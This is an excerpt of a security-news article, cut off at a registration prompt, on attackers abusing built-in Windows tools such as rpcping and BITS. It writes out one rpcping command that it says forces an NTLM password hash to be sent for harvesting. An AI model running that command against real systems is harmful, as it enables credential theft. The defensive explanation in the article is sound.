How to prevent attackers from using Windows against you

Attackers use standard Microsoft components such as DLLs or PowerShell to avoid detection. These tips will make such "living off the land" attacks harder to execute.

A hacker attacks from within a Windows system.
AlphaSpirit / Getty Images

One of the topics covered In a recent RSA Conference presentation was how attackers are using the victims’ own Windows operating system against them to avoid detection. This concept of “living off the land” (LotL) — the use of binaries, DLLs and other computer code that is already on our system — makes it harder to protect our systems.

These binaries are either default to the Microsoft operating system or downloaded from the Microsoft download site. The binary can also have interesting or unintended functionality such as persistence, User Account Control (UAC) bypass, credential theft or other techniques that would be significant to attackers. You can review the potential attacks and uses of the binaries listed on the LOLBQW site.

For example, attackers can use the command rpcping to capture credentials. They can send a remote procedure call (RPC) test connection to the target server (-s) and force the NT LAN Manager (NTLM) hash to be sent in the process. The command rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM allows the attacker to harvest the hash of a password.

Another example that is often used in attacks is a tool used to protect and patch systems. Background Intelligent Transfer Service (BITS) is used by Microsoft to deliver and manage the updating process. Attackers use BITS to transfer malicious files, create alternative data streams, or copy and execute files.

To continue reading this article register now

The 10 most powerful cybersecurity companies